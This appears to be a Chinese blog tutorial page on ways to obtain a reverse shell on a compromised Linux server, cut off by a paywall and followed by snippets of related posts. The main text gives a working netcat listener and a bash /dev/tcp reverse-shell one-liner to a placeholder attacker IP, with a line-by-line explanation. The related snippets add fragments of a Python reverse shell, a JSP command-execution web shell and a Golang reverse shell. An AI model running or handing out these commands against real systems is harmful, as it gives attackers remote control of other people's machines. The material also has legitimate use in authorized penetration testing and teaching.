多种姿势反弹shell

最新推荐文章于 2025-07-18 14:06:22 发布
原创 最新推荐文章于 2025-07-18 14:06:22 发布 · 7.4k 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。

0x01. Bash反弹

攻击者主机上执行监听:

nc -lvvp port

目标主机上执行:

bash -i >& /dev/tcp/x.x.x.x/port 0>&1

简单解释下:

  • bash -i   打开一个交互的bash
  • >&   将标准错误输出重定向到标准输出
  • /dev/tcp/x.x.x.x/port   意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
  • 0>&1   标准输入重定向到标准输出,实现你与反弹出来的shell的交互

注:

/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

linux shell下常用的文件描述符是:

1.标准输入 (stdin) :代码为 0 ,使用 < 或 << ;

2.标准输出 (stdout):代码为 1 ,使用 > 或 >> ;

3.标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。

最低0.47元/天 解锁文章

200万优质内容无限畅学
Linux反弹shell
谢公子的博客
11-29 9687
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
各种Getshell姿势总结
m0_53087192的博客
01-18 1663
一、进后台getshell 正常上传文件 直接上传一句话木马。 修改网站上传类型Getshell 修改网站上传类型,后台设置中添aasps|asp|php|jsp|aspx|asa|cer,保存后上传aasps文件,上传后为asp文件可以解析Getshll。 后台数据库备份Getshell 后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 8740
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell的27种方法 都学会搞定90%的渗透!
最新发布
2401_84578953的博客
07-18 316
根据目标系统的环境和权限,攻击者可以编写自定义的反弹shell脚本。import oshost ='x.x.x.x'# 攻击者IPport =1234# 监听端口将此脚本上传到目标系统并执行,即可建立反弹shell连接。
反弹shell
soldi_er的博客
04-16 3692
文章目录反向连接的概念反向连接命令命令分析Linux符号知识本地测试实战记录参考 反向连接的概念   反弹shell,是指目标向服务器端口发起请求,发送目标shell命令行的输入输出,服务器通过监听端口来获得请求内容。reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端/服务端的角色反转。   为什么不正向连接?通常用于连接目标机器防火墙受限、权限不足、端口被占用等情形。正向连接,包括远程桌面、Web服务、ssh、Telnet等。 反向连接命令 命令分析   示例
linux 渗透 密码,linux渗透中常用命令+Tip
weixin_42128141的博客
05-03 256
1.bashattacker 监听nc -lvvp 4444victim 运行bash -i >& /dev/tcp//4444 0>&12. pythonattacker 监听nc -lvvp 4444victim 运行python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock...
反弹shell的方式
08-11
反弹shell的方式有多种,具体的方式取决于目标系统的类型和渗透测试工具的选择。在Linux系统下,一种常见的反弹shell方式是通过Bash反弹。这种方式可以使用一些命令行工具(如nc或socat)来建立与攻击者之间的连接。...
HackTheBox-多种姿势渗透beep靶机
weixin_43111940的博客
04-19 401
端口信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open s
Cobalt strike的使用
weixin_50130859的博客
08-24 1058
Cobalt strikeCobalt strike一.启动,连接服务器二.让主机上线 Cobalt strike Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。它是渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。 Cobalt Strike分为客户端和服务端可
Linux系统下反弹shell
若有战,召必回
11-30 3256
之前研究过一段时间的反弹shell,所以本文是我个人对反弹shell的理解,当然,本人才疏学浅,如有啥错的地方,各位师傅指出,共同学习一起进步!!!0x00 定义受害者由于某种原因主动向攻击者发起连接,攻击者可向受害者下发命令并得到命令执行结果,即为反弹shell。某种原因,包括但不限于受害机器运行了远控木马(钓鱼邮件附件),存在RCE漏洞等0x01 本质网络通信+命令执行+重定向方式。
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
反弹Shell总结
code_lab
09-05 837
jsp shell<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("shell"); //获取参数 Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStre
浅谈反弹shell
weixin_53284312的博客
01-12 2735
反弹shell
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6710
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
【转】反弹Shell,看这一篇就够了
mastergu2的博客
10-26 3万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell详细易懂讲解,看这一篇就够了
LCW991207的博客
05-26 2412
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
golang写的反弹shell(自作孽不可活,切记,切记!)
热门推荐
神棍之路
10-23 7万+
仅作安全研究 package main import ( "go-pop3" "log" "strings" "os/exec" "net" "fmt" "syscall" "bufio" ) func reverseshell(addr string){ c,_:=net.Dial("tcp", addr);
反弹shell汇总(超详细)
人无名,便可潜心练剑。
05-27 1万+
反弹shell姿势大全,看这一篇就够啦~
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值